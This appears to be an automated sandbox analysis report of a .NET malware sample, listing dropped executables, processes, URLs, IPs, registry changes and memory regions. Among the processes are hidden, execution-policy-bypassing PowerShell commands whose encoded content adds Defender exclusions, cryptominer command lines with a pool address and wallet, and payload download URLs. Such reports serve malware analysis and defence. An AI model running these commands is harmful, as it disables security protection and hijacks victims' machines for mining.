Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
e2kLb2J2Y7.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\xddtyli.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Key.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Values.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e2kLb2J2Y7.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xddtyli.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\zhtyxulkfny.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_142zoxi1.oib.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3cvdoh0g.iaz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4nvtqfku.ri2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fwyl4it1.mvo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhtdv54i.3nm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnvtic2h.ien.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwhf1zdc.h5s.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rmh0k21e.rgz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_slbckglv.hdn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_solqoxdo.avw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tnpdzbff.jpy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3zy0y5e.cma.ps1
|
ASCII text, with no line terminators
|
dropped
|
There are 14 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\e2kLb2J2Y7.exe
|
C:\Users\user\Desktop\e2kLb2J2Y7.exe
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
|
||
C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe
|
C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
|
||
C:\Users\user\AppData\Local\Temp\xddtyli.exe
|
C:\Users\user\AppData\Local\Temp\xddtyli.exe
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
|
||
C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe
|
C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
|
||
C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe
|
C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU
-p x --algo rx/0 --cpu-max-threads-hint=50
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU
-p x --algo rx/0 --cpu-max-threads-hint=50
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU
-p x --algo rx/0 --cpu-max-threads-hint=50
|
||
C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe
|
C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU
-p x --algo rx/0 --cpu-max-threads-hint=50
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU
-p x --algo rx/0 --cpu-max-threads-hint=50
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU
-p x --algo rx/0 --cpu-max-threads-hint=50
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 10 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://schemas.m
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://163.123.142.171:8080/file/1699834997-Prvrec.exe
|
163.123.142.171
|
||
http://163.123.142.171:8080/file/1699833590-plugin3.dll
|
163.123.142.171
|
||
http://schemas.microsoft
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://stackoverflow.com/q/14436606/23354
|
unknown
|
||
https://github.com/mgravell/protobuf-netJ
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://xmrig.com/wizard%s
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://github.com/mgravell/protobuf-net
|
unknown
|
||
https://xmrig.com/wizard
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://github.com/mgravell/protobuf-neti
|
unknown
|
||
https://stackoverflow.com/q/11564914/23354;
|
unknown
|
||
https://stackoverflow.com/q/2152978/23354
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://xmrig.com/docs/algorithms
|
unknown
|
||
https://xmrig.com/benchmark/%s
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 16 hidden URLs, click here to show them.
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
163.123.142.171
|
unknown
|
Reserved
|
||
91.92.244.36
|
unknown
|
Bulgaria
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\CD933EBD60597A8B2BC8
|
CD933EBD60597A8B2BC8
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\cd933ebd60597a8b2bc8cd020020c0c6
|
9c73252fca15bab77cb7b7121f99df79
|
||
HKEY_CURRENT_USER\SOFTWARE\cd933ebd60597a8b2bc8cd020020c0c6
|
FC9641F0F232AB74D864F4AC14A0DB49
|
There are 21 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
23277B60000
|
trusted library allocation
|
page read and write
|
||
1EEBF780000
|
trusted library section
|
page read and write
|
||
23277AE8000
|
trusted library allocation
|
page read and write
|
||
3A81000
|
trusted library allocation
|
page read and write
|
||
3581000
|
trusted library allocation
|
page read and write
|
||
140481000
|
remote allocation
|
page execute and read and write
|
||
1EEB753D000
|
trusted library allocation
|
page read and write
|
||
13EB9000
|
trusted library allocation
|
page read and write
|
||
1404B1000
|
remote allocation
|
page execute and read and write
|
||
23277B10000
|
trusted library allocation
|
page read and write
|
||
1407AE000
|
remote allocation
|
page execute and read and write
|
||
34C0000
|
trusted library section
|
page read and write
|
||
1EEA7447000
|
trusted library allocation
|
page read and write
|
||
23277C00000
|
trusted library allocation
|
page read and write
|
||
1EEA6FF0000
|
trusted library section
|
page read and write
|
||
1EEA70C1000
|
trusted library allocation
|
page read and write
|
||
1EEB77A0000
|
trusted library allocation
|
page read and write
|
||
2326752E000
|
trusted library allocation
|
page read and write
|
||
14288000
|
trusted library allocation
|
page read and write
|
||
35E0000
|
trusted library section
|
page read and write
|
||
3A01000
|
trusted library allocation
|
page read and write
|
||
13A98000
|
trusted library allocation
|
page read and write
|
||
3D71000
|
trusted library allocation
|
page read and write
|
||
232676F7000
|
trusted library allocation
|
page read and write
|
||
2326595F000
|
heap
|
page read and write
|
||
1EEA759D000
|
trusted library allocation
|
page read and write
|
||
2372648B000
|
trusted library allocation
|
page read and write
|
||
1C700000
|
heap
|
page read and write
|
||
1402E6000
|
remote allocation
|
page execute and read and write
|
||
1C6D3000
|
heap
|
page read and write
|
||
EF43907000
|
stack
|
page read and write
|
||
3F5C000
|
trusted library allocation
|
page read and write
|
||
BD4E5E1000
|
stack
|
page read and write
|
||
7FFD349C4000
|
trusted library allocation
|
page read and write
|
||
2326773C000
|
trusted library allocation
|
page read and write
|
||
7FFD34AA0000
|
trusted library allocation
|
page read and write
|
||
232002CA000
|
heap
|
page read and write
|
||
29DEC4AE000
|
heap
|
page read and write
|
||
1D55000
|
heap
|
page read and write
|
||
7FFD349D9000
|
trusted library allocation
|
page read and write
|
||
23267521000
|
trusted library allocation
|
page read and write
|
||
1D788000
|
heap
|
page read and write
|
||
2373DBE0000
|
heap
|
page read and write
|
||
E90000
|
heap
|
page read and write
|
||
7FFD349D3000
|
trusted library allocation
|
page read and write
|
||
7FFD34AFC000
|
trusted library allocation
|
page read and write
|
||
39FF000
|
stack
|
page read and write
|
||
23200443000
|
heap
|
page read and write
|
||
1EEA56D5000
|
heap
|
page read and write
|
||
23267AE3000
|
trusted library allocation
|
page read and write
|
||
93859E1000
|
stack
|
page read and write
|
||
E30000
|
trusted library allocation
|
page read and write
|
||
270D6701000
|
trusted library allocation
|
page read and write
|
||
2C8B55C0000
|
heap
|
page read and write
|
||
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
191C000
|
heap
|
page read and write
|
||
13C59000
|
trusted library allocation
|
page read and write
|
||
4018000
|
trusted library allocation
|
page read and write
|
||
1BE0F000
|
heap
|
page read and write
|
||
270C6540000
|
heap
|
page readonly
|
||
1403EF000
|
remote allocation
|
page execute and read and write
|
||
3BD8000
|
trusted library allocation
|
page read and write
|
||
1EEBFABB000
|
heap
|
page read and write
|
||
7FFD34A80000
|
trusted library allocation
|
page read and write
|
||
7FFD34960000
|
trusted library allocation
|
page execute and read and write
|
||
270C747F000
|
trusted library allocation
|
page read and write
|
||
7FFD347AD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD347FC000
|
trusted library allocation
|
page execute and read and write
|
||
EF42CBE000
|
stack
|
page read and write
|
||
1EEBFBB0000
|
heap
|
page read and write
|
||
1545000
|
heap
|
page read and write
|
||
F63000
|
heap
|
page read and write
|
||
7FFD3494A000
|
trusted library allocation
|
page read and write
|
||
1BE0D000
|
stack
|
page read and write
|
||
7FFD34B20000
|
trusted library allocation
|
page read and write
|
||
2C93906D000
|
heap
|
page read and write
|
||
23265AA0000
|
heap
|
page execute and read and write
|
||
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
FBE000
|
heap
|
page read and write
|
||
1C6F0000
|
heap
|
page execute and read and write
|
||
1C741000
|
heap
|
page read and write
|
||
7FFD3495A000
|
trusted library allocation
|
page read and write
|
||
14006B000
|
remote allocation
|
page execute and read and write
|
||
1D7D0000
|
heap
|
page read and write
|
||
23725220000
|
heap
|
page readonly
|
||
1EEBF998000
|
heap
|
page read and write
|
||
1D5CD000
|
heap
|
page read and write
|
||
1B7E000
|
stack
|
page read and write
|
||
140204000
|
remote allocation
|
page execute and read and write
|
||
1EEBFBE1000
|
heap
|
page read and write
|
||
23200609000
|
heap
|
page read and write
|
||
1335000
|
heap
|
page read and write
|
||
7FFD34810000
|
trusted library allocation
|
page read and write
|
||
23200153000
|
heap
|
page read and write
|
||
7FFD347CD000
|
trusted library allocation
|
page execute and read and write
|
||
151F000
|
stack
|
page read and write
|
||
1EEB7365000
|
trusted library allocation
|
page read and write
|
||
1EEBF0F0000
|
trusted library allocation
|
page read and write
|
||
270C6928000
|
trusted library allocation
|
page read and write
|
||
2326591D000
|
heap
|
page read and write
|
||
232000F9000
|
heap
|
page read and write
|
||
14046C000
|
unkown
|
page execute and read and write
|
||
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
29DEC3F0000
|
heap
|
page read and write
|
||
23200137000
|
heap
|
page read and write
|
||
1EEA7261000
|
trusted library allocation
|
page read and write
|
||
1EEA76CA000
|
trusted library allocation
|
page read and write
|
||
1EEA7508000
|
trusted library allocation
|
page read and write
|
||
BD4F5FC000
|
stack
|
page read and write
|
||
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
EF42C3E000
|
stack
|
page read and write
|
||
7FFD3484C000
|
trusted library allocation
|
page execute and read and write
|
||
1CF8E000
|
stack
|
page read and write
|
||
7FFD34BB0000
|
trusted library allocation
|
page read and write
|
||
93871FF000
|
stack
|
page read and write
|
||
7FFD347A4000
|
trusted library allocation
|
page read and write
|
||
1EEBFE35000
|
heap
|
page read and write
|
||
1115000
|
heap
|
page read and write
|
||
7FFD34AF4000
|
trusted library allocation
|
page read and write
|
||
3D93000
|
trusted library allocation
|
page read and write
|
||
23200151000
|
heap
|
page read and write
|
||
29DD38CA000
|
heap
|
page read and write
|
||
270C78D5000
|
trusted library allocation
|
page read and write
|
||
7FFD348B0000
|
trusted library allocation
|
page execute and read and write
|
||
23200632000
|
heap
|
page read and write
|
||
7FFD34840000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD349AD000
|
trusted library allocation
|
page read and write
|
||
BD4F1FF000
|
stack
|
page read and write
|
||
3670000
|
heap
|
page read and write
|
||
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
148C000
|
heap
|
page read and write
|
||
29DE42AA000
|
trusted library allocation
|
page read and write
|
||
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
23200090000
|
heap
|
page read and write
|
||
13B61000
|
trusted library allocation
|
page read and write
|
||
29DEC7B5000
|
heap
|
page read and write
|
||
1EEA7523000
|
trusted library allocation
|
page read and write
|
||
1EEA754B000
|
trusted library allocation
|
page read and write
|
||
2373D962000
|
heap
|
page read and write
|
||
EE6000
|
heap
|
page read and write
|
||
270C5FF0000
|
heap
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page execute and read and write
|
||
E90000
|
heap
|
page read and write
|
||
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
1C7C0000
|
heap
|
page execute and read and write
|
||
1B90D000
|
heap
|
page read and write
|
||
1EEBF960000
|
heap
|
page execute and read and write
|
||
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
3E8D000
|
trusted library allocation
|
page read and write
|
||
3FA4000
|
trusted library allocation
|
page read and write
|
||
270C74E2000
|
trusted library allocation
|
page read and write
|
||
9386DFE000
|
stack
|
page read and write
|
||
23265840000
|
heap
|
page read and write
|
||
1EEA52A0000
|
unkown
|
page readonly
|
||
93861FF000
|
stack
|
page read and write
|
||
798E178000
|
stack
|
page read and write
|
||
2373DC1C000
|
heap
|
page read and write
|
||
23200435000
|
heap
|
page read and write
|
||
F3A000
|
heap
|
page read and write
|
||
7FFD34950000
|
trusted library allocation
|
page execute and read and write
|
||
14397000
|
trusted library allocation
|
page read and write
|
||
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
1D80A000
|
heap
|
page read and write
|
||
137F000
|
heap
|
page read and write
|
||
2320045D000
|
heap
|
page read and write
|
||
7FFD34974000
|
trusted library allocation
|
page read and write
|
||
1EEA5360000
|
heap
|
page read and write
|
||
14CC000
|
heap
|
page read and write
|
||
23725276000
|
heap
|
page execute and read and write
|
||
7FFD349BB000
|
trusted library allocation
|
page read and write
|
||
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
270C7476000
|
trusted library allocation
|
page read and write
|
||
1404C6000
|
remote allocation
|
page execute and read and write
|
||
1EEBFE42000
|
heap
|
page read and write
|
||
412F000
|
trusted library allocation
|
page read and write
|
||
23200334000
|
heap
|
page read and write
|
||
14046D000
|
remote allocation
|
page execute and read and write
|
||
7FFD347EC000
|
trusted library allocation
|
page execute and read and write
|
||
1D628000
|
heap
|
page read and write
|
||
23200472000
|
heap
|
page read and write
|
||
3D1B000
|
trusted library allocation
|
page read and write
|
||
140242000
|
remote allocation
|
page execute and read and write
|
||
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
7FFD34A8F000
|
trusted library allocation
|
page read and write
|
||
270C7FEC000
|
trusted library allocation
|
page read and write
|
||
7FFD3497F000
|
trusted library allocation
|
page read and write
|
||
7FFD34932000
|
trusted library allocation
|
page read and write
|
||
3C15000
|
trusted library allocation
|
page read and write
|
||
7FFD347BB000
|
trusted library allocation
|
page execute and read and write
|
||
1402C8000
|
unkown
|
page execute and read and write
|
||
232003EA000
|
heap
|
page read and write
|
||
7FFD34793000
|
trusted library allocation
|
page execute and read and write
|
||
29DEC7E1000
|
heap
|
page read and write
|
||
798E27E000
|
stack
|
page read and write
|
||
2320065D000
|
heap
|
page read and write
|
||
1EEBFE2D000
|
heap
|
page read and write
|
||
1EEBFB70000
|
heap
|
page read and write
|
||
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
1EEB7927000
|
trusted library allocation
|
page read and write
|
||
1EEBF9A7000
|
heap
|
page read and write
|
||
1C702000
|
heap
|
page read and write
|
||
7FFD34BED000
|
trusted library allocation
|
page read and write
|
||
7FFD34B30000
|
trusted library allocation
|
page read and write
|
||
1CBFE000
|
stack
|
page read and write
|
||
23267846000
|
trusted library allocation
|
page read and write
|
||
23726D1B000
|
trusted library allocation
|
page read and write
|
||
7DF42FE00000
|
trusted library allocation
|
page execute and read and write
|
||
1D74F000
|
heap
|
page read and write
|
||
1C6D0000
|
heap
|
page read and write
|
||
29DD4FA2000
|
trusted library allocation
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page execute and read and write
|
||
29DEC580000
|
heap
|
page execute and read and write
|
||
237252A0000
|
trusted library allocation
|
page read and write
|
||
23724BE0000
|
heap
|
page read and write
|
||
2373D95E000
|
heap
|
page read and write
|
||
1403AC000
|
remote allocation
|
page execute and read and write
|
||
23265860000
|
heap
|
page read and write
|
||
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
1D893000
|
heap
|
page read and write
|
||
EFD000
|
heap
|
page read and write
|
||
1EEA76FA000
|
trusted library allocation
|
page read and write
|
||
1EEBFC40000
|
heap
|
page read and write
|
||
2373DBAE000
|
heap
|
page read and write
|
||
7FFD3485C000
|
trusted library allocation
|
page execute and read and write
|
||
F20000
|
heap
|
page read and write
|
||
1C31C000
|
stack
|
page read and write
|
||
1EEA763F000
|
trusted library allocation
|
page read and write
|
||
232000B1000
|
heap
|
page read and write
|
||
1D3CE000
|
stack
|
page read and write
|
||
D889E7E000
|
stack
|
page read and write
|
||
1C7AE000
|
heap
|
page read and write
|
||
232002CC000
|
heap
|
page read and write
|
||
1403B2000
|
unkown
|
page execute and read and write
|
||
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
1C340000
|
heap
|
page read and write
|
||
7FFD34B93000
|
trusted library allocation
|
page read and write
|
||
14013D000
|
unkown
|
page execute and read and write
|
||
270DED80000
|
heap
|
page execute and read and write
|
||
3BA2000
|
trusted library allocation
|
page read and write
|
||
F55000
|
heap
|
page read and write
|
||
1C1F0000
|
heap
|
page execute and read and write
|
||
270C790E000
|
trusted library allocation
|
page read and write
|
||
1EEA7351000
|
trusted library allocation
|
page read and write
|
||
232676A8000
|
trusted library allocation
|
page read and write
|
||
7FFD349B8000
|
trusted library allocation
|
page read and write
|
||
29DEC7E8000
|
heap
|
page read and write
|
||
270C7F63000
|
trusted library allocation
|
page read and write
|
||
29DD523F000
|
trusted library allocation
|
page read and write
|
||
7DF445580000
|
trusted library allocation
|
page execute and read and write
|
||
1EEBFA2E000
|
heap
|
page read and write
|
||
798DEFE000
|
stack
|
page read and write
|
||
14013C000
|
remote allocation
|
page execute and read and write
|
||
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
23265930000
|
heap
|
page read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
EF429F9000
|
stack
|
page read and write
|
||
7FFD34950000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
1EEB7900000
|
trusted library allocation
|
page read and write
|
||
7FFD34783000
|
trusted library allocation
|
page execute and read and write
|
||
1C70D000
|
heap
|
page read and write
|
||
1EEA72C8000
|
trusted library allocation
|
page read and write
|
||
EF4398C000
|
stack
|
page read and write
|
||
1C9AD000
|
heap
|
page read and write
|
||
1D679000
|
heap
|
page read and write
|
||
23726C33000
|
trusted library allocation
|
page read and write
|
||
1EEBFAC9000
|
heap
|
page read and write
|
||
1770000
|
heap
|
page read and write
|
||
1EEA71C8000
|
trusted library allocation
|
page read and write
|
||
1D4EE000
|
heap
|
page read and write
|
||
7FFD347BD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD347A3000
|
trusted library allocation
|
page execute and read and write
|
||
3C9D000
|
trusted library allocation
|
page read and write
|
||
270DEDB4000
|
heap
|
page read and write
|
||
